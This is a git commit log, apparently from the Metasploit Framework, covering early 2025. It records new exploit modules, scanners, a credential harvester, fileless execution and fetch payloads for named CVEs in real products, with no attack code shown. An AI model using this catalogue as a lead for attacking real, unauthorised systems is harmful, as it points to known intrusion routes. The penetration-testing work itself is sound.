EasyMoney322
aa5eda4876
Fix 404 link in eicar.txt ( #19912 )
...
Updated the link to EICAR's test-file as the old one returns 404
2025-02-27 16:17:10 +00:00
h00die
689fb49b6e
correct password in hashes table ( #19911 )
2025-02-27 15:15:45 +00:00
jenkins-metasploit
c1a81ebf5a
automatic module_metadata_base.json update
2025-02-27 14:35:25 +00:00
Diego Ledda
7e0b3af790
Land #19879 , Add MsDtypSecurityDescriptor to_sddl_text
...
Land #19879 , Add MsDtypSecurityDescriptor to_sddl_text
2025-02-27 15:28:27 +01:00
Diego Ledda
8c24e98fdd
Land #19902 , Fix byte to int conversion in MsAdts
...
Land #19902 , Fix byte to int conversion in MsAdts
2025-02-27 15:25:50 +01:00
Metasploit
1d801225df
Bump version of framework to 6.4.52
2025-02-27 03:33:05 -06:00
jenkins-metasploit
5bb99d120f
automatic module_metadata_base.json update
2025-02-26 19:30:51 +00:00
Spencer McIntyre
c49b49bdcd
Merge pull request #19893 from bwatters-r7/fix/loadmaster_priv_esc_cve
...
Remove errant CVE reference.
2025-02-26 14:24:09 -05:00
Spencer McIntyre
d37039c08f
Add tests for byte to int conversions
2025-02-26 09:29:35 -05:00
Spencer McIntyre
b853168a89
Make common byte to int conversion functions
2025-02-26 09:29:30 -05:00
Spencer McIntyre
fcee4db5d0
Reorder the buffer fields to match windows
2025-02-25 17:44:54 -05:00
jenkins-metasploit
0cbd4d1db2
automatic module_metadata_base.json update
2025-02-25 12:20:54 +00:00
Diego Ledda
8dd032e529
Land #19897 , Invoice Ninja unauthenticated RCE (CVE-2024-55555) and Laravel Crypto Killer mixin
...
Land #19897 , Invoice Ninja unauthenticated RCE (CVE-2024-55555) and Laravel Crypto Killer mixin
2025-02-25 13:14:18 +01:00
Diego Ledda
1c27e2a958
docs: update docs for rubocop
2025-02-25 12:15:52 +01:00
jenkins-metasploit
b0cd258540
automatic module_metadata_base.json update
2025-02-25 11:10:14 +00:00
Diego Ledda
f046e70b76
Land #19894 , SimpleHelp Path Traversal CVE-2024-57727
...
Land #19894 , SimpleHelp Path Traversal CVE-2024-57727
2025-02-25 12:00:34 +01:00
jenkins-metasploit
458d086fa6
automatic module_metadata_base.json update
2025-02-25 10:42:49 +00:00
msutovsky-r7
576ff2fb5c
Land #19878 , MyScada MyPro Manager Credential Harverster Module
...
mySCADA MyPRO Manager Credential Harvester (CVE-2025-24865 & CVE-2025-22896) Module
2025-02-25 11:35:59 +01:00
Spencer McIntyre
3487b485e9
Fix an API change from an old commit ( #19880 )
2025-02-25 10:15:33 +00:00
jenkins-metasploit
b55a945669
automatic module_metadata_base.json update
2025-02-25 09:50:00 +00:00
Diego Ledda
33d0c0c9fd
Land #19881 , NetAlertX File Read (CVE-2024-48766)
...
Land #19881 , NetAlertX File Read (CVE-2024-48766)
2025-02-25 10:42:52 +01:00
Martin Sutovsky
183d5823cc
Rollback of fix for check method
2025-02-25 10:21:31 +01:00
Jack Heysel
e4ee651c9b
Updated docs, fixed Notes
2025-02-24 10:26:01 -08:00
h00die-gr3y
79411eace8
added code sugesstions from dledda-r7
2025-02-24 15:51:32 +00:00
Martin Sutovsky
fae3d8390a
Calling check method fix & Additional documentation
2025-02-24 15:52:00 +01:00
H00die.Gr3y
2d55f5c16e
Update documentation/modules/exploit/linux/http/invoiceninja_unauth_rce_cve_2024_55555.md
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2025-02-24 15:51:06 +01:00
Martin Sutovsky
e883da86cc
Adding report_vuln
2025-02-24 12:19:59 +01:00
Martin Sutovsky
f7342139b4
Code refactor based on PR
2025-02-24 12:05:04 +01:00
h00die-gr3y
41e690445e
simplified some code sections
2025-02-23 12:59:52 +00:00
h00die-gr3y
ece33ee8ec
added documentation
2025-02-23 09:54:26 +00:00
H00die.Gr3y
b3a5da976b
Apply suggestions from code review
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2025-02-22 10:35:45 +01:00
h00die-gr3y
47a2079d19
initial module and laravel crypto killer mixin
2025-02-21 18:09:28 +00:00
Jack Heysel
fc25e177fc
SimpleHelp Path Traversal CVE-2024-57727
2025-02-21 08:15:46 -08:00
jenkins-metasploit
e7ed432159
automatic module_metadata_base.json update
2025-02-21 01:30:23 +00:00
Brendan
e9fc6e3b27
Merge pull request #19841 from h00die-gr3y/raspberrymatic-unauth-rce
...
RaspberryMatic unauthenticated RCE (Zip Slip) [CVE-2024-24578]
2025-02-20 19:22:30 -06:00
h00die-gr3y
215957465c
added default options and updated documentation
2025-02-20 13:19:41 -06:00
h00die-gr3y
15c20272ea
removed linux dropper code and tested with PR 19850
2025-02-20 13:19:41 -06:00
h00die-gr3y
fcc929e228
updated documentation with Linux Dropper (x86_64) target scenario
2025-02-20 13:19:41 -06:00
h00die-gr3y
f857e5fe67
fixed code review and updated documentation
2025-02-20 13:19:41 -06:00
H00die.Gr3y
38b3741a15
Apply suggestions from code review
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2025-02-20 13:19:41 -06:00
h00die-gr3y
682be79920
first release module and documentation
2025-02-20 13:19:41 -06:00
h00die-gr3y
baac1fc9d0
init commit module
2025-02-20 13:19:40 -06:00
Martin Sutovsky
2cdaf98c74
Fixing descriptions, filename, adding correct CVE and code reformat
2025-02-20 19:48:36 +01:00
msutovsky-r7
27120235d4
Merge branch 'rapid7:master' into netalert_file_read
2025-02-20 19:47:55 +01:00
Metasploit
3613013938
Bump version of framework to 6.4.51
2025-02-20 11:47:22 -06:00
jenkins-metasploit
42a7ff093d
automatic module_metadata_base.json update
2025-02-20 16:20:32 +00:00
Brendan
c7d59ce829
Merge pull request #19875 from dledda-r7/fix/aarch64-sigill-raspberrypi
...
Fix SIGILL on staged meterpreter on RaspberryPi4
2025-02-20 10:14:07 -06:00
h4x-x0r
0aad255e13
updated
...
updated
2025-02-20 15:40:05 +00:00
bwatters-r7
c8aea65c7a
Remove errant CVE reference.
2025-02-20 08:19:23 -06:00
jenkins-metasploit
0b0b9bb68a
automatic module_metadata_base.json update
2025-02-20 10:51:07 +00:00
Diego Ledda
4374484147
Land #19850 , Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64, ppc64le
...
Land #19850 , Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64, ppc64le
2025-02-20 11:43:17 +01:00
bwatters-r7
8cbcdd1f6c
Add PPC64LE Fetch payloads
2025-02-19 18:10:55 -06:00
bwatters-r7
87ec9ee137
Remove CBEA64 arch values so PPC64 arches have only 1 arch value
...
Multiple arches broke payload adaptyers and we do not use them, anyway
2025-02-19 17:57:39 -06:00
dledda-r7
cdac13550b
fix: sync syscall comment
2025-02-19 03:58:11 -05:00
jenkins-metasploit
d626e56089
automatic module_metadata_base.json update
2025-02-19 01:40:04 +00:00
Brendan
66d657f385
Merge pull request #19810 from h00die/fix_loadmaster_2024
...
Fix loadmaster privesc check method and refs
2025-02-18 19:34:00 -06:00
Brendan
e9d4a9d918
Merge pull request #19858 from msutovsky-r7/fileless_elf_execution
...
Fileless elf execution
2025-02-18 15:05:47 -06:00
Simon Janusz
8f00370370
Make datastore to_h sane ( #19890 )
...
* Bump metasploit_data_models gem
* Make datastore to_h sane
2025-02-18 15:54:53 +00:00
Martin Sutovsky
0d87703dd8
Land #19871 , fixing ELF version in Aarch64 template
2025-02-18 15:43:25 +01:00
jenkins-metasploit
d0000af09a
automatic module_metadata_base.json update
2025-02-18 13:08:28 +00:00
Martin Sutovsky
bd42b23ef0
Land #19883 , module for unauthenticated RCE in InvokeAI
2025-02-18 14:01:11 +01:00
msutovsky-r7
f132b8ffe1
Update documentation/modules/auxiliary/scanner/http/netalertx_file_read.md
...
Co-authored-by: Takahiro Yokoyama <tkhr.y0k0yama@gmail.com >
2025-02-18 13:44:26 +01:00
msutovsky-r7
7cf02c5b14
Update modules/auxiliary/scanner/http/netalertx_file_read.rb
...
Co-authored-by: Takahiro Yokoyama <tkhr.y0k0yama@gmail.com >
2025-02-18 13:44:21 +01:00
Takahiro Yokoyama
6eaae79dc2
Update modules/exploits/linux/http/invokeai_rce_cve_2024_12029.rb
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2025-02-18 21:21:19 +09:00
Takah1ro
32db7ee6ae
Use plain payload
2025-02-18 08:22:15 +09:00
Takah1ro
3ce313ac89
Rubocop formatting
2025-02-18 08:14:56 +09:00
Takahiro Yokoyama
a26572d318
Update modules/exploits/linux/http/invokeai_rce_cve_2024_12029.rb
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2025-02-18 08:09:25 +09:00
jenkins-metasploit
e60be7fcfb
automatic module_metadata_base.json update
2025-02-17 16:51:25 +00:00
msutovsky-r7
05c9550d43
Land #19877 , BeyondTrust Privileged Remote Access & Remote Support RCE Module
...
Exploit module for BeyondTrust Privileged Remote Access & Remote Support (CVE-2024-12356, CVE-2025-1094)
2025-02-17 17:43:15 +01:00
sfewer-r7
65e2a20a5d
We can remove this line as it is redundant. The regex that follows will check for the same thing as part of its matching expression. Thanks msutovsky-r7 for spoting this.
2025-02-17 16:33:11 +00:00
cgranleese-r7
2e9326897f
Land #19887 , Update reload_lib to ignore gemfiles
2025-02-17 14:14:02 +00:00
adfoster-r7
f16d31b7b1
Update reload_lib to ignore gemfiles
2025-02-17 13:50:41 +00:00
sfewer-r7
bb9013a8ee
check the frame for nil
2025-02-17 12:29:50 +00:00
cgranleese-r7
80922124c8
Land #19884 , Add osvdb search to msfconsole
2025-02-17 12:19:52 +00:00
sfewer-r7
6f1287d899
add in some logic to detect potentially failed exploitation due to the patch being applied, warning a user of a WebSocket getting closed unexpectadly
2025-02-17 12:17:15 +00:00
sfewer-r7
fbef2baf5c
remove the uneeded parenthesis and make rubocop happy.
2025-02-17 11:44:50 +00:00
sfewer-r7
c950264a85
Add some comments in the check routine to note theres is no known lower bound version number, and the patch does not change the version number.
2025-02-17 11:35:22 +00:00
Stephen Fewer
ed54130346
Explicitly close the WebSocket connection
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2025-02-17 11:35:03 +00:00
Takah1ro
611556571f
Update document
2025-02-17 20:32:43 +09:00
dwelch-r7
19c6cd899c
Land #19885 , Improve module search performance
2025-02-17 11:27:54 +00:00
adfoster-r7
a66981f9e7
Improve module search performance
2025-02-17 11:08:42 +00:00
adfoster-r7
3f85d6d46d
Add osvb search to msfconsole
2025-02-17 10:06:39 +00:00
Stephen Fewer
130895671f
Remove a duplicate work in this comment (Thanks jvoisin)
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2025-02-17 09:46:59 +00:00
Stephen Fewer
6ed60547a3
Print the actual status code in the error message (Thanks msutovsky-r7)
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2025-02-17 09:43:46 +00:00
Stephen Fewer
eb1feba767
Fix typo in comment (Thanks jvoisin)
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2025-02-17 09:42:50 +00:00
Takah1ro
b454a32f3c
Fix typo and update document
2025-02-17 12:52:50 +09:00
Martin Sutovsky
dddcdccbef
Fixing generating certutil fetch command
2025-02-16 20:31:24 +01:00
msutovsky-r7
e284ea5dc7
Merge branch 'rapid7:master' into fileless_elf_execution
2025-02-16 20:01:15 +01:00
Takah1ro
0945fbba81
Add InvokeAI unauth RCE module (CVE-2024-12029)
2025-02-16 15:49:56 +09:00
msutovsky-r7
b647aec3cb
Merge pull request #2 from bwatters-r7/collab/19858
...
Slight fixes and prep for adding piped fetch payloads
2025-02-14 16:06:27 +01:00
Martin Sutovsky
00d4feb2b5
Adding documentation, file renaming
2025-02-14 14:43:43 +01:00
sfewer-r7
2d858ac1f0
Improve the auto discovery of the target site info. We can query an undocumented API endpoint to discover the target site company name.
2025-02-14 09:38:13 +00:00
Martin Sutovsky
f44620939f
Adding module for NetAlertX File Read
2025-02-14 10:35:05 +01:00
dledda-r7
80b76e4f5f
docs: add reference to the pull-request inside source
2025-02-14 04:33:06 -05:00
Spencer McIntyre
48c4ce56e4
Raise a specific error and update specs
2025-02-14 01:42:22 -05:00
Spencer McIntyre
c9dc97c242
Update some modules to print the SDDL
2025-02-13 17:19:43 -05:00
Spencer McIntyre
c979d8d477
Add the #to_sddl_text method for security descriptors
2025-02-13 17:19:37 -05:00
h4x-x0r
5a9df32e14
update
2025-02-13 21:45:29 +00:00
bwatters-r7
46e97e3776
Slight fixes and prep for adding piped fetch payloads
2025-02-13 11:35:06 -06:00
sfewer-r7
9fc8b3b0dc
fix a typo
2025-02-13 15:12:23 +00:00
sfewer-r7
90daccd948
add in link to AKB analysis
2025-02-13 15:10:41 +00:00
simonirwin-r7
d9cb3651f4
PD-49865 set Cortex tags to identify repo exposure ( #19876 )
2025-02-13 14:46:33 +00:00
sfewer-r7
d93a99c504
rename the module
2025-02-13 12:51:46 +00:00
Metasploit
9dac85e3c9
Bump version of framework to 6.4.50
2025-02-13 03:34:13 -06:00
Brendan
7b4678564a
Update modules/payloads/adapters/cmd/linux/https/ppc64.rb
...
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2025-02-12 15:52:15 -06:00
Brendan
3465b57e48
Update modules/payloads/adapters/cmd/linux/tftp/ppc64.rb
...
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2025-02-12 15:52:08 -06:00
Brendan
b7dd63f0a9
Update modules/payloads/adapters/cmd/linux/tftp/ppc.rb
...
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2025-02-12 15:52:03 -06:00
Brendan
c098665a2e
Update modules/payloads/adapters/cmd/linux/http/ppc64.rb
...
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2025-02-12 15:51:57 -06:00
Brendan
6424a4a387
Update modules/payloads/adapters/cmd/linux/http/ppc.rb
...
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2025-02-12 15:51:49 -06:00
bwatters-r7
4e5a21bfab
Update payload cache size
2025-02-12 13:40:34 -06:00
sfewer-r7
18f0bbeaf0
add in the new CVE ID for the PosgreSQL vuln
2025-02-12 17:23:19 +00:00
sfewer-r7
37276446a6
improve the description for this option
2025-02-12 17:22:43 +00:00
sfewer-r7
c9be9b65ec
fix typos in docs
2025-02-12 17:22:17 +00:00
dledda-r7
d22ed19b02
fix: fix port number offset
2025-02-12 11:49:35 -05:00
dledda-r7
4876320814
fix: add sync syscall after read to prevent sigill in raspberrypi
2025-02-12 11:33:45 -05:00
h00die
a5d7dfb139
Merge pull request #19870 from jmartin-tech/fix/expand-data-workflow-perms
...
allow workflow content write
2025-02-12 08:14:32 -05:00
jenkins-metasploit
10a3b267b8
automatic module_metadata_base.json update
2025-02-11 22:21:40 +00:00
Spencer McIntyre
a9ab6668a4
Merge pull request #19873 from adfoster-r7/remove-report-note-calls-from-vuln-cert-finder
...
Remove report note calls from vuln cert finder
2025-02-11 17:15:25 -05:00
Spencer McIntyre
31b8fad08f
Allow SIDs to be set by strings
2025-02-11 17:00:46 -05:00
adfoster-r7
0fefe063ad
Remove report note calls from vuln cert finder
2025-02-11 21:21:55 +00:00
bwatters-r7
d031df5b6b
Change the aarch64 elf version in template file and reassemble
2025-02-11 08:47:14 -06:00
jenkins-metasploit
517bf5481d
automatic module_metadata_base.json update
2025-02-11 08:32:04 +00:00
Martin Sutovsky
984f0dbb15
Land #19868 , NetAlertX RCE module
2025-02-11 08:23:57 +01:00
Jeffrey Martin
13df710797
allow content write
...
To enabled branch and commit `content` must be added
2025-02-10 22:26:04 -06:00
Takah1ro
2db7f4f186
Use BadChars and Base64Decoder
2025-02-11 11:25:24 +09:00
Takahiro Yokoyama
edbdb985e3
Apply suggestions from code review
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2025-02-11 08:59:37 +09:00
adfoster-r7
9396e1c91b
Merge pull request #19869 from adfoster-r7/consolidate-datastore-with-fallbacks-logic
...
Consolidate datastore with fallbacks logic
2025-02-10 19:10:17 +00:00
msutovsky-r7
d96d980a24
Land #19846 , module for CVE-2024-47407 MySCADA MyPro Manager
...
mySCADA MyPRO Manager Command Injection (CVE-2024-47407) Module
2025-02-10 16:25:32 +01:00
Takah1ro
9f43fcc7ad
Update FETCH_COMMAND default to curl
2025-02-10 22:00:52 +09:00
Takah1ro
8d59201447
Update document
2025-02-10 21:38:14 +09:00
Takah1ro
7149d3f332
Leave cleanup as an option
2025-02-10 21:31:50 +09:00
Takah1ro
92a73b1fed
Fix after applying suggestions
2025-02-10 21:18:19 +09:00
Takahiro Yokoyama
127adda3df
Update modules/exploits/linux/http/netalertx_rce_cve_2024_46506.rb
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2025-02-10 21:06:50 +09:00
Takah1ro
b02838a8dd
NetAlertx -> NetAlertX
2025-02-10 12:52:26 +09:00
adfoster-r7
8e9c144e2c
Consolidate datastore with fallbacks logic
2025-02-09 20:26:52 +00:00
Martin Sutovsky
881ae72550
Optimizing execution of fetch command in bash
2025-02-09 09:17:19 +01:00
Takah1ro
4f584bd5a4
Use cron restart
2025-02-08 17:35:55 +09:00
Takah1ro
00f4f80530
Add NetAlertx rce module (CVE-2024-46506)
2025-02-08 14:40:31 +09:00
h4x-x0r
85875d8338
Removed ampersand
...
Removed ampersand
2025-02-08 02:30:57 +00:00
h4x-x0r
41a0e089ea
CVE-2025-24865 & CVE-2025-22896
...
CVE-2025-24865 & CVE-2025-22896
2025-02-08 02:22:11 +00:00
Simon Janusz
300e99db01
Land #19867 , Update nokogiri dependency
...
Update nokogiri dependency
2025-02-07 16:48:26 +00:00
adfoster-r7
ad8c1c3f43
Update nokogiri dependency
2025-02-07 16:26:52 +00:00
Martin Sutovsky
dfb1ed6d30
Land #19842 , fixing jtr_format for NTLM hashes
2025-02-07 13:24:10 +01:00
adfoster-r7
94c1167515
Merge pull request #19829 from cgranleese-r7/updates-meterpeter-pipeline-to-build-payloads-gem
...
Updates `shared_meterpreter_acceptance.yml` pipeline to build the metasploit-payloads gem
2025-02-07 12:05:01 +00:00
Martin Sutovsky
ed648e9eca
Adding more reliable fileless fetch payload
2025-02-07 10:12:28 +01:00
jheysel-r7
cddfb499b7
Merge pull request #19864 from jmartin-tech/fix/restrict-workflow-to-r7
...
Restrict weekly data PR tooling to rapid7 repo
2025-02-06 11:15:31 -08:00
jheysel-r7
6861b1fb67
Merge pull request #19729 from sempervictus/bug/shell_command_overlap
...
Fix overlap of shell built-in commands with host's
2025-02-06 10:27:12 -08:00
Martin Sutovsky
6d073540e8
More elegant way of generating fileless payload, code refactor based on comments
2025-02-06 19:22:36 +01:00
Jeffrey Martin
6da074e164
Restrict weekly PR tooling to rapid7 repo
2025-02-06 09:27:40 -06:00
jenkins-metasploit
7112fb27e6
automatic module_metadata_base.json update
2025-02-06 14:06:13 +00:00
Brendan
853b42cfaf
Merge pull request #19851 from zeroSteiner/feat/mod/adcs-cert-template-flags
...
Parse and display the flags field
2025-02-06 08:00:02 -06:00
Martin Sutovsky
50c95af7e0
Refactoring fileless execution, adjusting generating fetch commands
2025-02-06 11:28:05 +01:00
Metasploit
05a2e9dc9f
Bump version of framework to 6.4.49
2025-02-06 03:32:51 -06:00
jheysel-r7
deef85deb6
Merge pull request #19779 from h00die/action_update_weekly
...
Weekly Updater Action
2025-02-05 10:10:30 -08:00
jenkins-metasploit
7f5f459c86
automatic module_metadata_base.json update
2025-02-05 17:51:07 +00:00
jheysel-r7
476ad5bb94
Merge pull request #19856 from bwatters-r7/update/esc8-auto-dc
...
Change behavior of esc8 'AUTO' mode to attempt to get a cert based on DC and Machine types
2025-02-05 09:44:47 -08:00
Martin Sutovsky
e3bb4791e1
Refactoring based on comments
2025-02-05 13:55:58 +01:00
Martin Sutovsky
0d558a1f71
Fileless execution condition specified
2025-02-05 09:08:34 +01:00
Martin Sutovsky
b678126361
Code factor, adding comments
2025-02-05 07:33:42 +01:00
h00die
e6fb4f876e
Update .github/workflows/weekly-data-and-external-tool-updater.yml
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2025-02-04 16:45:40 -05:00
bwatters-r7
7e8c35257e
Update docs, fix space in module
2025-02-04 15:41:33 -06:00
Diego Ledda
f22295b10f
Land #19857 , Ivanti HTTP Module fix
...
Land #19857 , Ivanti HTTP Module fix
2025-02-04 19:08:41 +01:00
Martin Sutovsky
a2044acc42
Bug fixed
2025-02-04 15:38:59 +01:00
Martin Sutovsky
b98fb7553d
Adding FETCH_FILELESS option
2025-02-04 13:26:50 +01:00
msutovsky-r7
20d2a6c7a7
Merge branch 'rapid7:master' into fileless_elf_execution
2025-02-04 09:47:02 +01:00
Martin Sutovsky
6ab32cde32
Ivanti HTTP Module fix based on remaining comments
2025-02-04 07:24:10 +01:00
bwatters-r7
3f8db70d45
Change behavior of 'AUTO' mode to attempt to get a cert based on DomainController and Machine templates
2025-02-03 17:10:31 -06:00
Spencer McIntyre
0caaa5d655
Parse and display the flags field
2025-02-03 17:29:33 -05:00
jenkins-metasploit
90ad8b66d8
automatic module_metadata_base.json update
2025-02-03 20:49:51 +00:00
jheysel-r7
652fbf1a62
Merge pull request #19813 from h00die/local_version_patch
...
guard Rex::Version.new against crashes on local modules
2025-02-03 12:43:37 -08:00
jenkins-metasploit
4aedaaa222
automatic module_metadata_base.json update
2025-02-03 17:24:03 +00:00
Diego Ledda
ba8d5b7f5a
Land #19844 , Add Ivanti Connect Secure HTTP Login Module
...
Land #19844 , Add Ivanti Connect Secure HTTP Login Module
2025-02-03 18:17:36 +01:00
msutovsky-r7
46d2d4c63d
Update lib/metasploit/framework/login_scanner/ivanti_login.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2025-02-03 18:05:54 +01:00
Martin Sutovsky
834e499b2a
Adding check for presence of logout token
2025-02-03 16:44:01 +01:00
Martin Sutovsky
09db1f4e72
Adding documentation
2025-02-03 15:29:49 +01:00
Martin Sutovsky
f06a2d47f8
Code refactor, merging classes into one
2025-02-03 06:34:49 +01:00
jenkins-metasploit
88ba2de1be
automatic module_metadata_base.json update
2025-01-31 23:07:31 +00:00
jheysel-r7
f3eefc0d7e
Merge pull request #19849 from zeroSteiner/feat/mod/ldap/esc-finder-updates
...
AD CS Workflow Related Changes
2025-01-31 15:00:14 -08:00
jenkins-metasploit
ec9edc5d6c
automatic module_metadata_base.json update
2025-01-31 22:05:36 +00:00
jheysel-r7
373ea48838
Merge pull request #19847 from TheBigStonk/argus_dvr_4_lfi_cve_2018_15745
...
Argus LFI Auxiliary Module with Associated Doc (CVE-2018-15745)
2025-01-31 13:59:27 -08:00
jheysel-r7
6f945ca1ce
Merge pull request #19837 from adfoster-r7/fix-task-service-tracking-bug
...
Fix task service tracking bug
2025-01-31 13:56:00 -08:00
jheysel-r7
917196b8a1
Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
2025-01-31 12:49:35 -08:00
jheysel-r7
7259548cb9
Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
2025-01-31 11:52:00 -08:00
Spencer McIntyre
0013db1822
Fix a regression in the loop logic
2025-01-31 14:48:57 -05:00
Spencer McIntyre
f8dfaae599
Guard FQDN lookup logic a bit more
...
Use DNS first, then fail back to LDAP
2025-01-31 09:42:22 -05:00
sfewer-r7
c6d03069a9
add in the documentation
2025-01-31 11:02:01 +00:00
sfewer-r7
d887ab5fac
add in module option to leverage CVE-2024-12356. This option is disabled by default, and we hit the SQLi directly.
2025-01-31 10:01:02 +00:00
TheBigStonk
2003ed7fd0
Fixed changes from rubocop linting
2025-01-31 22:55:32 +13:00
sfewer-r7
528409ba87
add in the exploit for cve-2024-12356
2025-01-31 09:20:54 +00:00
TheBigStonk
3170849147
Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
...
Adding in RPORT default option
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2025-01-31 11:21:48 +13:00
TheBigStonk
6f2ff5110e
Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
...
awesome cutting this one out then :)
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2025-01-31 11:20:22 +13:00
TheBigStonk
7adff997d2
Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
...
TIL, thanks
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2025-01-31 11:19:00 +13:00
TheBigStonk
cf9e80aa1e
Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
...
Good spot
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2025-01-31 11:15:53 +13:00
TheBigStonk
48921cadb6
Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
...
Apologies for that this is my first module. Yeah want to make sure John Page is given appropriate kudos.
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2025-01-31 11:14:51 +13:00
TheBigStonk
22818f07fa
Update modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
...
Oh cool, I'm new-ish to Ruby. Prefer this :)
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2025-01-31 11:11:34 +13:00
bwatters-r7
1d3bbcb573
Add specs to pass tests
2025-01-30 14:36:23 -06:00
bwatters-r7
cf5f518590
Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64
2025-01-30 13:51:05 -06:00
Spencer McIntyre
61a0981013
Update the spec to accept the failure
2025-01-30 14:43:50 -05:00
Martin Sutovsky
37bfe9368b
Addressing comments from pull request
2025-01-30 13:01:40 +01:00
TheBigStonk
d67dcda2c6
Added Argus LFI Module and Docs
2025-01-31 00:23:34 +13:00
Metasploit
64be670dfa
Bump version of framework to 6.4.48
2025-01-30 03:32:46 -06:00
Spencer McIntyre
5c2056b2e1
Update kerberos/get_ticket to return values
2025-01-29 16:34:25 -05:00
Spencer McIntyre
441b671edd
Update to include return values
2025-01-29 16:34:25 -05:00
Spencer McIntyre
210b780f83
Refactor reporting template permissions
2025-01-29 16:34:25 -05:00
Spencer McIntyre
e072468042
Some adjustments for ESC4 compatibility with MSP
2025-01-29 16:34:25 -05:00
Spencer McIntyre
7b03844312
Consolidate the report details
2025-01-29 16:34:25 -05:00
Spencer McIntyre
1aa4a1f8c8
Resolve the CA address via DNS records in LDAP
2025-01-29 16:34:25 -05:00
Spencer McIntyre
f0f1aa9eb3
Add initial MsDnsp data structures
2025-01-29 16:34:25 -05:00
Spencer McIntyre
3fb94b46c4
Update the ESC finder module's reporting
2025-01-29 16:34:25 -05:00
jenkins-metasploit
7d1c008377
automatic module_metadata_base.json update
2025-01-29 21:19:01 +00:00
jheysel-r7
aa78924f67
Merge pull request #19843 from cdelafuente-r7/fix/mod/ldap_smb_login
...
Fix ldap_login and smb_login
2025-01-29 13:12:46 -08:00
h4x-x0r
21b3315229
updated
...
updated
2025-01-29 20:18:05 +00:00
Martin Sutovsky
7ebd4f34ef
Adding Ivanti Connect Secure HTTP Login Scaner Module
2025-01-29 15:29:47 +01:00
Christophe De La Fuente
1885b650ba
Fix ldap_login and smb_login
2025-01-29 11:10:30 +01:00
jenkins-metasploit
157763b2af
automatic module_metadata_base.json update
2025-01-28 21:07:20 +00:00
jheysel-r7
6232463701
Merge pull request #19835 from cdelafuente-r7/fix/kerberos/ticket_lookup
...
Kerberos ticket lookup fix
2025-01-28 13:01:05 -08:00
Jack Heysel
8e68d1d5f2
Fixed spacing
2025-01-28 10:40:13 -08:00
Jack Heysel
9d50fb66bc
Fix jtr_format assignment in HashCapture module
2025-01-28 10:14:36 -08:00
cgranleese-r7
1b50e60a26
Updates meterpreter pipeline to now build the payloads gem
2025-01-28 10:41:14 +00:00
Spencer McIntyre
936e0dfb75
Merge pull request #19833 from cdelafuente-r7/fix/mod/petitpotam
...
Fix PetitPotam UUID when using EsfRPC with `lsarpc` named pipe
2025-01-27 13:09:14 -05:00
adfoster-r7
fcee7a5972
Rollback origin support for vulns
2025-01-27 12:44:58 +00:00
Christophe De La Fuente
b3c2ae4f51
Move EfsrpcOverLsarpc module under the MetasploitModule class
2025-01-27 08:35:00 +01:00
jenkins-metasploit
589b9067e6
automatic module_metadata_base.json update
2025-01-26 17:05:58 +00:00
adfoster-r7
fbe9edfa0c
Merge pull request #19836 from 0xAryan/nibbleblog_link_fix
...
Link fix for exploit/multi/http/nibbleblog_file_upload
2025-01-26 16:59:14 +00:00
0xAryan
ddf07a3d60
Link fix for exploit/multi/http/nibbleblog_file_upload
2025-01-26 19:20:12 +05:30
jenkins-metasploit
f6e49e43c7
automatic module_metadata_base.json update
2025-01-24 20:43:24 +00:00
Spencer McIntyre
4a8ad46249
Merge pull request #19816 from jheysel-r7/esc_4_detection
...
Add ESC4 detection to ldap_esc_vulnerable_cert_finder module
2025-01-24 15:37:10 -05:00
jenkins-metasploit
93d16732f2
automatic module_metadata_base.json update
2025-01-24 17:57:22 +00:00
jheysel-r7
bd45ae36a8
Merge pull request #19826 from zeroSteiner/fix/mod/ldap-query/run-single-base
...
Update ldap_query datastore option usage
2025-01-24 09:50:57 -08:00
adfoster-r7
47fe31754e
Merge pull request #19834 from sfewer-r7/fix-http_client-websockets
...
Fix Exploit::Remote::HttpClient#connect_ws to be spec compliant
2025-01-24 16:43:17 +00:00
Stephen Fewer
4c0f407b39
favor SecureRandom.bytes over Rex::Text.rand_text_alphanumeric
...
